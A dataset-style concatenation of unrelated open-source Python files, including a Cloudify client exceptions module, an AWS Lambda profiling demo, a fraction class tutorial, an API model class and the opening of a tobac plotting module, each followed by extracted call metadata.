12, 299, 29), 'numpy.arcsin', 'np.arcsin', ({(299, 22, 299, 28): '(a ** 0.5)'}, {}), '(a ** 0.5)', True, 'import numpy as np\n'), ((32, 51, 32, 69), 'numpy.sin', 'np.sin', ({(32, 58, 32, 68): '(lat * x_pi)'}, {}), '(lat * x_pi)', True, 'import numpy as np\n'), ((33, 46, 33, 64), 'numpy.cos', 'np.cos', ({(33, 53, 33, 63): '(lng * x_pi)'}, {}), '(lng * x_pi)', True, 'import numpy as np\n'), ((34, 17, 34, 30), 'numpy.cos', 'np.cos', ({(34, 24, 34, 29): 'theta'}, {}), '(theta)', True, 'import numpy as np\n'), ((35, 17, 35, 30), 'numpy.sin', 'np.sin', ({(35, 24, 35, 29): 'theta'}, {}), '(theta)', True, 'import numpy as np\n'), ((65, 43, 65, 59), 'numpy.sin', 'np.sin', ({(65, 50, 65, 58): '(y * x_pi)'}, {}), '(y * x_pi)', True, 'import numpy as np\n'), ((66, 42, 66, 58), 'numpy.cos', 'np.cos', ({(66, 49, 66, 57): '(x * x_pi)'}, {}), '(x * x_pi)', True, 'import numpy as np\n'), ((234, 24, 234, 33), 'numpy.abs', 'np.abs', ({(234, 31, 234, 32): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((298, 8, 298, 22), 'numpy.sin', 'np.sin', ({(298, 15, 298, 21): '(dlat / 2)'}, {}), '(dlat / 2)', True, 'import numpy as np\n'), ((321, 55, 321, 75), 'shapely.ops.transform', 'transform', ({(321, 65, 321, 71): 'method', (321, 73, 321, 74): 'r'}, {}), '(method, r)', False, 'from shapely.ops import transform\n'), ((103, 45, 103, 59), 'numpy.cos', 'np.cos', ({(103, 52, 103, 58): 'radlat'}, {}), '(radlat)', True, 'import numpy as np\n'), ((140, 45, 140, 59), 'numpy.cos', 'np.cos', ({(140, 52, 140, 58): 'radlat'}, {}), '(radlat)', True, 'import numpy as np\n'), ((244, 40, 244, 52), 'numpy.fabs', 'np.fabs', ({(244, 48, 244, 51): 'lng'}, {}), '(lng)', True, 'import numpy as np\n'), ((256, 40, 256, 51), 'numpy.abs', 'np.abs', ({(256, 47, 256, 50): 'lng'}, {}), '(lng)', True, 'import numpy as np\n'), ((298, 28, 298, 40), 'numpy.cos', 'np.cos', ({(298, 35, 298, 39): 'lat1'}, {}), '(lat1)', True, 'import numpy as np\n'), ((298, 43, 298, 55), 'numpy.cos', 'np.cos', ({(298, 50, 298, 54): 'lat2'}, {}), '(lat2)', True, 'import numpy as np\n'), ((298, 58, 298, 72), 'numpy.sin', 'np.sin', 
({(298, 65, 298, 71): '(dlon / 2)'}, {}), '(dlon / 2)', True, 'import numpy as np\n'), ((245, 19, 245, 41), 'numpy.sin', 'np.sin', ({(245, 26, 245, 40): '(6.0 * lng * pi)'}, {}), '(6.0 * lng * pi)', True, 'import numpy as np\n'), ((246, 12, 246, 34), 'numpy.sin', 'np.sin', ({(246, 19, 246, 33): '(2.0 * lng * pi)'}, {}), '(2.0 * lng * pi)', True, 'import numpy as np\n'), ((247, 19, 247, 35), 'numpy.sin', 'np.sin', ({(247, 26, 247, 34): '(lat * pi)'}, {}), '(lat * pi)', True, 'import numpy as np\n'), ((248, 12, 248, 34), 'numpy.sin', 'np.sin', ({(248, 19, 248, 33): '(lat / 3.0 * pi)'}, {}), '(lat / 3.0 * pi)', True, 'import numpy as np\n'), ((249, 20, 249, 43), 'numpy.sin', 'np.sin', ({(249, 27, 249, 42): '(lat / 12.0 * pi)'}, {}), '(lat / 12.0 * pi)', True, 'import numpy as np\n'), ((250, 12, 250, 35), 'numpy.sin', 'np.sin', ({(250, 19, 250, 34): '(lat * pi / 30.0)'}, {}), '(lat * pi / 30.0)', True, 'import numpy as np\n'), ((257, 19, 257, 41), 'numpy.sin', 'np.sin', ({(257, 26, 257, 40): '(6.0 * lng * pi)'}, {}), '(6.0 * lng * pi)', True, 'import numpy as np\n'), ((258, 12, 258, 34), 'numpy.sin', 'np.sin', ({(258, 19, 258, 33): '(2.0 * lng * pi)'}, {}), '(2.0 * lng * pi)', True, 'import numpy as np\n'), ((259, 19, 259, 35), 'numpy.sin', 'np.sin', ({(259, 26, 259, 34): '(lng * pi)'}, {}), '(lng * pi)', True, 'import numpy as np\n'), ((260, 12, 260, 34), 'numpy.sin', 'np.sin', ({(260, 19, 260, 33): '(lng / 3.0 * pi)'}, {}), '(lng / 3.0 * pi)', True, 'import numpy as np\n'), ((261, 20, 261, 43), 'numpy.sin', 'np.sin', ({(261, 27, 261, 42): '(lng / 12.0 * pi)'}, {}), '(lng / 12.0 * pi)', True, 'import numpy as np\n'), ((262, 12, 262, 35), 'numpy.sin', 'np.sin', ({(262, 19, 262, 34): '(lng / 30.0 * pi)'}, {}), '(lng / 30.0 * pi)', True, 'import numpy as np\n')] |
aleixsanchis/cloudify-rest-client | cloudify_rest_client/exceptions.py | 6acaadee8286ab647465824d3c8e13d4c43ca9ba | ########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class CloudifyClientError(Exception):
def __init__(self, message, server_traceback=None,
status_code=-1, error_code=None, response=None):
super(CloudifyClientError, self).__init__(message)
self.status_code = status_code
self.error_code = error_code
self.server_traceback = server_traceback
self.response = response
self.message = message
def __str__(self):
if self.status_code != -1:
formatted_error = '{0}: {1}'.format(self.status_code, self.message)
return formatted_error
return self.message
class DeploymentEnvironmentCreationInProgressError(CloudifyClientError):
"""
Raised when there's attempt to execute a deployment workflow and
deployment environment creation workflow execution is still running.
In such a case, workflow execution should be retried after a reasonable
time or after the execution of deployment environment creation workflow
has terminated.
"""
ERROR_CODE = 'deployment_environment_creation_in_progress_error'
class DeploymentEnvironmentCreationPendingError(CloudifyClientError):
"""
Raised when there's attempt to execute a deployment workflow and
deployment environment creation workflow execution is pending.
In such a case, workflow execution should be retried after a reasonable
time or after the execution of deployment environment creation workflow
has terminated.
"""
ERROR_CODE = 'deployment_environment_creation_pending_error'
class IllegalExecutionParametersError(CloudifyClientError):
"""
Raised when an attempt to execute a workflow with wrong/missing parameters
has been made.
"""
ERROR_CODE = 'illegal_execution_parameters_error'
class NoSuchIncludeFieldError(CloudifyClientError):
"""
Raised when an _include query parameter contains a field which does not
exist for the queried data model.
"""
ERROR_CODE = 'no_such_include_field_error'
class MissingRequiredDeploymentInputError(CloudifyClientError):
"""
Raised when a required deployment input was not specified on deployment
creation.
"""
ERROR_CODE = 'missing_required_deployment_input_error'
class UnknownDeploymentInputError(CloudifyClientError):
"""
Raised when an unexpected input was specified on deployment creation.
"""
ERROR_CODE = 'unknown_deployment_input_error'
class UnknownDeploymentSecretError(CloudifyClientError):
"""
Raised when a required secret was not found on deployment creation.
"""
ERROR_CODE = 'unknown_deployment_secret_error'
class UnsupportedDeploymentGetSecretError(CloudifyClientError):
"""
Raised when an unsupported get_secret intrinsic function appears in
the blueprint on deployment creation.
"""
ERROR_CODE = 'unsupported_deployment_get_secret_error'
class FunctionsEvaluationError(CloudifyClientError):
"""
Raised when function evaluation failed.
"""
ERROR_CODE = 'functions_evaluation_error'
class UnknownModificationStageError(CloudifyClientError):
"""
Raised when an unknown modification stage was provided.
"""
ERROR_CODE = 'unknown_modification_stage_error'
class ExistingStartedDeploymentModificationError(CloudifyClientError):
"""
Raised when a deployment modification start is attempted while another
deployment modification is currently started
"""
ERROR_CODE = 'existing_started_deployment_modification_error'
class DeploymentModificationAlreadyEndedError(CloudifyClientError):
"""
Raised when a deployment modification finish/rollback is attempted on
a deployment modification that has already been finished/rolledback
"""
ERROR_CODE = 'deployment_modification_already_ended_error'
class UserUnauthorizedError(CloudifyClientError):
"""
Raised when a call has been made to a secured resource with an
unauthorized user (no credentials / bad credentials)
"""
ERROR_CODE = 'unauthorized_error'
class ForbiddenError(CloudifyClientError):
"""
Raised when a call has been made by a user that is not permitted to
perform it
"""
ERROR_CODE = 'forbidden_error'
class PluginInUseError(CloudifyClientError):
"""
Raised if a central deployment agent plugin deletion is attempted and at
least one deployment is currently using this plugin.
"""
ERROR_CODE = 'plugin_in_use'
class PluginInstallationError(CloudifyClientError):
"""
Raised if a central deployment agent plugin installation fails.
"""
ERROR_CODE = 'plugin_installation_error'
class PluginInstallationTimeout(CloudifyClientError):
"""
Raised if a central deployment agent plugin installation times out.
"""
ERROR_CODE = 'plugin_installation_timeout'
class MaintenanceModeActiveError(CloudifyClientError):
"""
Raised when a call has been blocked due to maintenance mode being active.
"""
ERROR_CODE = 'maintenance_mode_active'
def __str__(self):
return self.message
class MaintenanceModeActivatingError(CloudifyClientError):
"""
Raised when a call has been blocked while maintenance mode is activating.
"""
ERROR_CODE = 'entering_maintenance_mode'
def __str__(self):
return self.message
class NotModifiedError(CloudifyClientError):
"""
Raised when a 304 not modified error was returned
"""
ERROR_CODE = 'not_modified'
def __str__(self):
return self.message
class InvalidExecutionUpdateStatus(CloudifyClientError):
"""
Raised when execution update failed do to invalid status update
"""
ERROR_CODE = 'invalid_exception_status_update'
class NotClusterMaster(CloudifyClientError):
"""
Raised when the request was served by a manager that is not the master
node of a manager cluster.
The client should query for the cluster status to learn the master's
address, and retry the request.
If the client stores the server address, it should update the storage
with the new master node address.
"""
ERROR_CODE = 'not_cluster_master'
class RemovedFromCluster(CloudifyClientError):
"""
Raised when attempting to contact a manager that was removed from a
cluster.
The client should retry the request with another manager in the cluster.
If the client stores the server address, it should remove this node's
address from storage.
"""
ERROR_CODE = 'removed_from_cluster'
class DeploymentPluginNotFound(CloudifyClientError):
"""
Raised when a plugin is listed in the blueprint but is not
installed on the manager.
"""
ERROR_CODE = 'deployment_plugin_not_found'
ERROR_MAPPING = dict([
(error.ERROR_CODE, error)
for error in [
DeploymentEnvironmentCreationInProgressError,
DeploymentEnvironmentCreationPendingError,
IllegalExecutionParametersError,
NoSuchIncludeFieldError,
MissingRequiredDeploymentInputError,
UnknownDeploymentInputError,
UnknownDeploymentSecretError,
UnsupportedDeploymentGetSecretError,
FunctionsEvaluationError,
UnknownModificationStageError,
ExistingStartedDeploymentModificationError,
DeploymentModificationAlreadyEndedError,
UserUnauthorizedError,
ForbiddenError,
MaintenanceModeActiveError,
MaintenanceModeActivatingError,
NotModifiedError,
InvalidExecutionUpdateStatus,
PluginInUseError,
PluginInstallationError,
PluginInstallationTimeout,
NotClusterMaster,
RemovedFromCluster,
DeploymentPluginNotFound]])
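# Illustrative usage (editor's sketch, not part of the original module): the
# mapping above lets a response handler turn a server-side error code into the
# matching exception class; `error_code`, `message` and `status_code` below are
# placeholders for values parsed from an API error response.
#
#   exception_class = ERROR_MAPPING.get(error_code, CloudifyClientError)
#   raise exception_class(message, error_code=error_code, status_code=status_code)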
| [] |
sriharshams-aws/aws-codeguru-profiler-python-demo-application | sample-demo-lambda-app/lambda_function.py | 36e63bc6364871e6a7b29437c1fb68243d2c54f4 | import boto3
import logging
import os
from random import randrange
from urllib.request import urlopen
# It is not recommended to enable DEBUG logs in production,
# this is just to show an example of a recommendation
# by Amazon CodeGuru Profiler.
logging.getLogger('botocore').setLevel(logging.DEBUG)
SITE = 'http://www.python.org/'
CW_NAMESPACE = 'ProfilerPythonDemo'
S3_BUCKET = os.environ['S3_BUCKET']
def lambda_handler(event, context):
# Make some network calls using urllib and s3 client.
with urlopen(SITE) as response:
s3_client = boto3.client('s3')
s3_client.put_object(Body=response.read(),
Bucket=S3_BUCKET,
Key='response.txt')
# Publish metrics.
content_length = int(response.headers['Content-Length'])
put_metric('ResponseContentLength', content_length)
put_metric(str(response.status)[0] + 'xxStatus', 1)
# Generate some CPU-intensive work.
num = randrange(content_length)
count = 0
for _ in range(num):
x = randrange(num)
if check_prime(x):
count += 1
return count
def put_metric(name, value):
cw_client = boto3.client('cloudwatch')
metric_data_num = [{'MetricName': name, 'Value': value}]
cw_client.put_metric_data(Namespace=CW_NAMESPACE, MetricData=metric_data_num)
def check_prime(num):
if num == 1 or num == 0:
return False
sq_root = 2
while sq_root * sq_root <= num:
if num % sq_root == 0:
return False
sq_root += 1
return True
| [((32, 10, 32, 35), 'random.randrange', 'randrange', ({(32, 20, 32, 34): 'content_length'}, {}), '(content_length)', False, 'from random import randrange\n'), ((43, 16, 43, 42), 'boto3.client', 'boto3.client', ({(43, 29, 43, 41): '"""cloudwatch"""'}, {}), "('cloudwatch')", False, 'import boto3\n'), ((11, 0, 11, 29), 'logging.getLogger', 'logging.getLogger', ({(11, 18, 11, 28): '"""botocore"""'}, {}), "('botocore')", False, 'import logging\n'), ((20, 9, 20, 22), 'urllib.request.urlopen', 'urlopen', ({(20, 17, 20, 21): 'SITE'}, {}), '(SITE)', False, 'from urllib.request import urlopen\n'), ((21, 20, 21, 38), 'boto3.client', 'boto3.client', ({(21, 33, 21, 37): '"""s3"""'}, {}), "('s3')", False, 'import boto3\n'), ((35, 12, 35, 26), 'random.randrange', 'randrange', ({(35, 22, 35, 25): 'num'}, {}), '(num)', False, 'from random import randrange\n')] |
chuo06/palindrome | api/error_handler.py | 57660301390d7b2b05780e1f6ab0343e43726619 | from functools import wraps
from werkzeug.exceptions import HTTPException
from api.exceptions import MessageNotFound
def api_error_handler(func):
@wraps(func)
def handle_errors(*args, **kwargs):
try:
return func(*args, **kwargs)
except MessageNotFound as e:
return e.message, 404
except HTTPException:
raise
except Exception:
return "API Internal error", 500
return handle_errors
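# Illustrative usage (editor's sketch, not part of the original module):
# `get_message` and `message_store` are hypothetical names used only to show
# how the decorator is applied to a handler.
#
#   @api_error_handler
#   def get_message(message_id):
#       return message_store[message_id]   # may raise MessageNotFound
#
# A MessageNotFound raised inside the handler is then returned as a
# (message, 404) response instead of propagating.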
| [((7, 5, 7, 16), 'functools.wraps', 'wraps', ({(7, 11, 7, 15): 'func'}, {}), '(func)', False, 'from functools import wraps\n')] |
kootsZhin/nile | src/nile/core/run.py | 5b685158c06418a126229cfbcaeaaf78a38cd8a0 | """Command to run Nile scripts."""
import logging
from importlib.machinery import SourceFileLoader
from nile.nre import NileRuntimeEnvironment
def run(path, network):
"""Run nile scripts passing on the NRE object."""
logger = logging.getLogger()
logger.disabled = True
script = SourceFileLoader("script", path).load_module()
nre = NileRuntimeEnvironment(network)
script.run(nre)
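# Illustrative sketch (editor's addition, not part of the original module):
# `run()` loads the file at `path` as a module and calls its module-level
# `run(nre)` function, so a script passed to this command is expected to look
# roughly like the following (file name and body are placeholders):
#
#   # scripts/deploy.py
#   def run(nre):
#       print("deploying with the Nile runtime environment:", nre)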
| [((10, 13, 10, 32), 'logging.getLogger', 'logging.getLogger', ({}, {}), '()', False, 'import logging\n'), ((13, 10, 13, 41), 'nile.nre.NileRuntimeEnvironment', 'NileRuntimeEnvironment', ({(13, 33, 13, 40): 'network'}, {}), '(network)', False, 'from nile.nre import NileRuntimeEnvironment\n'), ((12, 13, 12, 45), 'importlib.machinery.SourceFileLoader', 'SourceFileLoader', ({(12, 30, 12, 38): '"""script"""', (12, 40, 12, 44): 'path'}, {}), "('script', path)", False, 'from importlib.machinery import SourceFileLoader\n')] |
PawarAditi/HackerRank | Python/Basic Data Types/Lists/Solution.py | fcd9d1450ee293372ce5f1d4a3b7284ecf472657 | array = []
for _ in range(int(input())):
command = input().strip().split(" ")
cmd_type = command[0]
if (cmd_type == "print"):
print(array)
elif (cmd_type == "sort"):
array.sort()
elif (cmd_type == "reverse"):
array.reverse()
elif (cmd_type == "pop"):
array.pop()
elif (cmd_type == "remove"):
array.remove(int(command[1]))
elif (cmd_type == "append"):
array.append(int(command[1]))
elif (cmd_type == "insert"):
array.insert(int(command[1]), int(command[2])) | [] |
horeapinca/DBEstClient | dbestclient/ml/density.py | 6ccbb24853c31f2a8cc567e03c09ca7aa31e2d26 | # Created by Qingzhi Ma at 2019-07-23
# All right reserved
# Department of Computer Science
# the University of Warwick
# [email protected]
from sklearn.neighbors import KernelDensity
class DBEstDensity:
def __init__(self, kernel=None):
        # Default to the Gaussian kernel when none is given; otherwise keep the caller's choice.
        self.kernel = 'gaussian' if kernel is None else kernel
        self.kde = None
def fit(self, x):
self.kde = KernelDensity(kernel=self.kernel).fit(x)
return self.kde | [((17, 19, 17, 52), 'sklearn.neighbors.KernelDensity', 'KernelDensity', (), '', False, 'from sklearn.neighbors import KernelDensity\n')] |
panchambanerjee/access_spotify | setup.py | d1c50d1553718755d58d034e8d2049f986ef5f84 | #!/usr/bin/env python
import setuptools
from setuptools import setup
from os import path
# Read the package requirements
with open("requirements.txt", "r") as f:
requirements = [line.rstrip("\n") for line in f if line != "\n"]
# Read the contents of the README file
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(name='access-spotify',
version="1.1",
author="pancham_banerjee",
author_email="[email protected]",
packages=setuptools.find_packages(),
scripts=["./bin/access_script.py"],
install_requires=requirements,
license="MIT",
description="A package to get all album and track info for an artist by querying the Spotify API",
long_description=long_description,
long_description_content_type='text/markdown'
)
| [((12, 30, 12, 52), 'os.path.dirname', 'path.dirname', ({(12, 43, 12, 51): '__file__'}, {}), '(__file__)', False, 'from os import path\n'), ((13, 10, 13, 48), 'os.path.join', 'path.join', ({(13, 20, 13, 34): 'this_directory', (13, 36, 13, 47): '"""README.md"""'}, {}), "(this_directory, 'README.md')", False, 'from os import path\n'), ((20, 15, 20, 41), 'setuptools.find_packages', 'setuptools.find_packages', ({}, {}), '()', False, 'import setuptools\n')] |
hugocpolos/MundiAPI-PYTHON | mundiapi/models/update_plan_request.py | 164545cc58bf18c946d5456e9ba4d55a378a339a | # -*- coding: utf-8 -*-
"""
mundiapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class UpdatePlanRequest(object):
"""Implementation of the 'UpdatePlanRequest' model.
Request for updating a plan
Attributes:
name (string): Plan's name
description (string): Description
installments (list of int): Number os installments
statement_descriptor (string): Text that will be shown on the credit
card's statement
currency (string): Currency
interval (string): Interval
interval_count (int): Interval count
payment_methods (list of string): Payment methods accepted by the
plan
billing_type (string): Billing type
status (string): Plan status
shippable (bool): Indicates if the plan is shippable
billing_days (list of int): Billing days accepted by the plan
metadata (dict<object, string>): Metadata
minimum_price (int): Minimum price
trial_period_days (int): Number of trial period in days, where the
customer will not be charged
"""
# Create a mapping from Model property names to API property names
_names = {
"name":'name',
"description":'description',
"installments":'installments',
"statement_descriptor":'statement_descriptor',
"currency":'currency',
"interval":'interval',
"interval_count":'interval_count',
"payment_methods":'payment_methods',
"billing_type":'billing_type',
"status":'status',
"shippable":'shippable',
"billing_days":'billing_days',
"metadata":'metadata',
"minimum_price":'minimum_price',
"trial_period_days":'trial_period_days'
}
def __init__(self,
name=None,
description=None,
installments=None,
statement_descriptor=None,
currency=None,
interval=None,
interval_count=None,
payment_methods=None,
billing_type=None,
status=None,
shippable=None,
billing_days=None,
metadata=None,
minimum_price=None,
trial_period_days=None):
"""Constructor for the UpdatePlanRequest class"""
# Initialize members of the class
self.name = name
self.description = description
self.installments = installments
self.statement_descriptor = statement_descriptor
self.currency = currency
self.interval = interval
self.interval_count = interval_count
self.payment_methods = payment_methods
self.billing_type = billing_type
self.status = status
self.shippable = shippable
self.billing_days = billing_days
self.metadata = metadata
self.minimum_price = minimum_price
self.trial_period_days = trial_period_days
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
name = dictionary.get('name')
description = dictionary.get('description')
installments = dictionary.get('installments')
statement_descriptor = dictionary.get('statement_descriptor')
currency = dictionary.get('currency')
interval = dictionary.get('interval')
interval_count = dictionary.get('interval_count')
payment_methods = dictionary.get('payment_methods')
billing_type = dictionary.get('billing_type')
status = dictionary.get('status')
shippable = dictionary.get('shippable')
billing_days = dictionary.get('billing_days')
metadata = dictionary.get('metadata')
minimum_price = dictionary.get('minimum_price')
trial_period_days = dictionary.get('trial_period_days')
# Return an object of this model
return cls(name,
description,
installments,
statement_descriptor,
currency,
interval,
interval_count,
payment_methods,
billing_type,
status,
shippable,
billing_days,
metadata,
minimum_price,
trial_period_days)
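# Illustrative usage (editor's sketch, not part of the original file): build the
# model from an API-style dictionary; keys missing from the dictionary simply
# become None on the resulting object. The values below are placeholders.
#
#   request = UpdatePlanRequest.from_dictionary({
#       'name': 'Gold plan',
#       'currency': 'BRL',
#       'interval': 'month',
#       'interval_count': 1
#   })
#   assert request.currency == 'BRL' and request.status is None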
| [] |
bertokhoury/python-hearthstone | hearthstone/hslog/utils.py | 635a8a14b85f468c1ab1d0bc9d0bcffaa00fda43 | from hearthstone.enums import GameTag, TAG_TYPES
def parse_enum(enum, value):
if value.isdigit():
value = int(value)
elif hasattr(enum, value):
value = getattr(enum, value)
else:
raise Exception("Unhandled %s: %r" % (enum, value))
return value
def parse_tag(tag, value):
tag = parse_enum(GameTag, tag)
if tag in TAG_TYPES:
value = parse_enum(TAG_TYPES[tag], value)
elif value.isdigit():
value = int(value)
else:
raise NotImplementedError("Invalid string value %r = %r" % (tag, value))
return tag, value
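# Illustrative usage (editor's sketch, not part of the original module):
# parse_tag() resolves the tag name through GameTag and, for tags listed in
# TAG_TYPES, resolves the value through the matching enum; purely numeric
# values are returned as ints. The example assumes the hearthstone enums
# expose GameTag.ZONE (typed via TAG_TYPES) and GameTag.DAMAGE.
#
#   parse_tag("ZONE", "HAND")    # -> (GameTag.ZONE, Zone.HAND)
#   parse_tag("DAMAGE", "3")     # -> (GameTag.DAMAGE, 3)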
| [] |
ernestoarzabala/Curso-Python-Utch | ejemplo_clase_00.py | ed5cd89ed85a1021d78fd17d495b3b3ec0203c77 | # Archivo ejemplo 00 de creacion de clases en Python
from math import gcd # greatest common denominator = Maximo Comun Divisor (MCD)
class Fraccion:
""" La clase Fraccion: Una fraccion es un part de enteros: un numerador (num)
y un denominador (den !=0 ) cuyo MCD es 1.
"""
def __init__(self,numerador,denominador):
""" Constructor de la clase. Construye una fracción a partir de dos enteros:
un numerador y un denominador.
¡El constructor se enloquece si el denominador es cero!
Nota mental:Agregar manejo de error para denominador igual a cero.
"""
numerador = int(numerador)
denominador = int(denominador)
hcf = gcd(numerador,denominador)
self.num, self.den = numerador/hcf, denominador/hcf
def __str__(self):
""" Generador de strings para representar una fracción.
Se necesita si se desea convertir ,o mostrar, una fraccion a string.
"""
return "%d/%d" % (self.num,self.den)
def __mul__(self,otrafraccion):
""" Función necesaria para el operador de multiplicación.
Multiplica dos fracciones para obtener una fraccion resultante
"""
return Fraccion(self.num*otrafraccion.num,self.den*otrafraccion.den)
def __add__(self,otrafraccion):
"""Función necesaria para el operador de suma.
Suma dos fracciones para obtener una fraccion resultante
"""
return Fraccion(self.num*otrafraccion.den+self.den*otrafraccion.num,self.den*otrafraccion.den)
def a_numero_real(self):
""" Función para convertir la fracción a un numero de punto flotante.
El equivalente numérico con punto decimal de la fracción.
"""
return float(self.num)/float(self.den)
if __name__ == "__main__":
a = Fraccion(5,12)
print(a)
b = Fraccion(3,5)
c = a*b
c_real = c.a_numero_real()
print("Multiplicar la fraccion {} por la fraccion {} da como resultado la fraccion {} que es equivalente a {}".format(a,b,c,c_real))# Escribe tu código aquí :-)
a = Fraccion(1,2)
print(a)
b = Fraccion(1,4)
c = a+b
c_real = c.a_numero_real()
print("Sumar la fraccion {} con la fraccion {} da como resultado la fraccion {} que es equivalente a {}".format(a,b,c,c_real))# Escribe tu código aquí :-)
| [((18, 14, 18, 40), 'math.gcd', 'gcd', ({(18, 18, 18, 27): 'numerador', (18, 28, 18, 39): 'denominador'}, {}), '(numerador, denominador)', False, 'from math import gcd\n')] |
odoochain/addons_oca | addons14/base_rest/__init__.py | 55d456d798aebe16e49b4a6070765f206a8885ca | from . import models
from . import components
from . import http
| [] |
WingCode/live-project | recs/live_project_popularity_recommender.py | 977dfbcaade35d8173dbb6ace102fe8998f1cdf4 | import os
import pandas as pd
class LiveProjectPopularityBasedRecs:
def __init__(self):
self.charts = {}
charts_folder = "charts"
if os.path.isdir(charts_folder):
for file in os.listdir("charts"):
name, ext = file.split('.')
if ext == "csv" and len(name) > 0:
self.charts[name] = pd.read_csv("{}/{}".format(charts_folder, file), index_col=0)
else:
print("Genre Global and Charts not implemented!")
def genre_chart(self, genre):
if genre in self.charts:
return self.charts[genre]
elif "Top" in self.charts:
return self.charts["Top"]
else:
return ""
| [((11, 11, 11, 39), 'os.path.isdir', 'os.path.isdir', ({(11, 25, 11, 38): 'charts_folder'}, {}), '(charts_folder)', False, 'import os\n'), ((13, 24, 13, 44), 'os.listdir', 'os.listdir', ({(13, 35, 13, 43): '"""charts"""'}, {}), "('charts')", False, 'import os\n')] |
hipnusleo/Laserjet | resource/pypi/cffi-1.9.1/testing/cffi0/snippets/distutils_module/setup.py | f53e0b740f48f2feb0c0bb285ec6728b313b4ccc |
from distutils.core import setup
import snip_basic_verify
setup(
py_modules=['snip_basic_verify'],
ext_modules=[snip_basic_verify.ffi.verifier.get_extension()])
| [((7, 17, 7, 63), 'snip_basic_verify.ffi.verifier.get_extension', 'snip_basic_verify.ffi.verifier.get_extension', ({}, {}), '()', False, 'import snip_basic_verify\n')] |
elise-baumgartner/onramp | pce/src/testing/test_pce.py | beb3c807264fcb70d8069ff2e3990b0ce3f59912 | #!../env/bin/python
"""A simple test script for the PCE portion of OnRamp.
Usage: ./test_pce.py
This script is only intended to be run in a fresh install of the repository. It
has side-effects that could corrupt module and user data if run in a production
setting.
Prior to running this script, ensure that onramp/pce/bin/onramp_pce_install.py
has been called and that the server is running. Also Ensure
./test_pce_config.cfg contains the proper settings.
"""
import nose
import sys
if __name__ == '__main__':
print (__doc__)
response = raw_input('(C)ontinue or (A)bort? ')
if response != 'C':
sys.exit(0)
nose.main()
| [((23, 4, 23, 15), 'nose.main', 'nose.main', ({}, {}), '()', False, 'import nose\n'), ((21, 8, 21, 19), 'sys.exit', 'sys.exit', ({(21, 17, 21, 18): '(0)'}, {}), '(0)', False, 'import sys\n')] |
w-herbst/tobac | tobac/plotting.py | 9f3b9812e9a13a26373e42d356f7d571366bb967 | import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import logging
from .analysis import lifetime_histogram
from .analysis import histogram_cellwise,histogram_featurewise
import numpy as np
def plot_tracks_mask_field_loop(track,field,mask,features,axes=None,name=None,plot_dir='./',
figsize=(10./2.54,10./2.54),dpi=300,
margin_left=0.05,margin_right=0.05,margin_bottom=0.05,margin_top=0.05,
**kwargs):
import cartopy.crs as ccrs
import os
from iris import Constraint
os.makedirs(plot_dir,exist_ok=True)
time=mask.coord('time')
if name is None:
name=field.name()
for time_i in time.points:
datetime_i=time.units.num2date(time_i)
constraint_time = Constraint(time=datetime_i)
fig1,ax1=plt.subplots(ncols=1, nrows=1,figsize=figsize, subplot_kw={'projection': ccrs.PlateCarree()})
datestring_file=datetime_i.strftime('%Y-%m-%d_%H:%M:%S')
field_i=field.extract(constraint_time)
mask_i=mask.extract(constraint_time)
track_i=track[track['time']==datetime_i]
features_i=features[features['time']==datetime_i]
ax1=plot_tracks_mask_field(track=track_i,field=field_i,mask=mask_i,features=features_i,
axes=ax1,**kwargs)
fig1.subplots_adjust(left=margin_left, bottom=margin_bottom, right=1-margin_right, top=1-margin_top)
os.makedirs(plot_dir, exist_ok=True)
savepath_png=os.path.join(plot_dir,name+'_'+datestring_file+'.png')
fig1.savefig(savepath_png,dpi=dpi)
logging.debug('Figure plotted to ' + str(savepath_png))
plt.close()
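# Illustrative usage (editor's sketch, not part of the original module):
# `track` and `features` are the pandas DataFrames and `field` and `mask` the
# iris cubes produced by tobac's feature detection, segmentation and tracking
# steps; the axis extent and colour limits below are placeholder values passed
# through to plot_tracks_mask_field().
#
#   plot_tracks_mask_field_loop(track=track, field=field, mask=mask,
#                               features=features, name='w_max',
#                               plot_dir='plots',
#                               axis_extent=[-95, -93.5, 29.5, 31],
#                               vmin=0, vmax=30)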
def plot_tracks_mask_field(track,field,mask,features,axes=None,axis_extent=None,
plot_outline=True,
plot_marker=True,marker_track='x',markersize_track=4,
plot_number=True,
plot_features=False,marker_feature=None,markersize_feature=None,
title=None,title_str=None,
vmin=None,vmax=None,n_levels=50,
cmap='viridis',extend='neither',
orientation_colorbar='horizontal',pad_colorbar=0.05,
label_colorbar=None,fraction_colorbar=0.046,
rasterized=True,linewidth_contour=1
):
import cartopy
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import iris.plot as iplt
from matplotlib.ticker import MaxNLocator
import cartopy.feature as cfeature
from .utils import mask_features,mask_features_surface
from matplotlib import ticker
if type(axes) is not cartopy.mpl.geoaxes.GeoAxesSubplot:
raise ValueError('axes had to be cartopy.mpl.geoaxes.GeoAxesSubplot')
datestr=field.coord('time').units.num2date(field.coord('time').points[0]).strftime('%Y-%m-%d %H:%M:%S')
    if title == 'datestr':
        if title_str is None:
            titlestring=datestr
        elif isinstance(title_str, str):
            titlestring=title_str + ' ' + datestr
        axes.set_title(titlestring,horizontalalignment='left',loc='left')
gl = axes.gridlines(draw_labels=True)
majorLocator = MaxNLocator(nbins=5,steps=[1,2,5,10])
gl.xlocator=majorLocator
gl.ylocator=majorLocator
gl.xformatter = LONGITUDE_FORMATTER
axes.tick_params(axis='both', which='major')
gl.yformatter = LATITUDE_FORMATTER
gl.xlabels_top = False
gl.ylabels_right = False
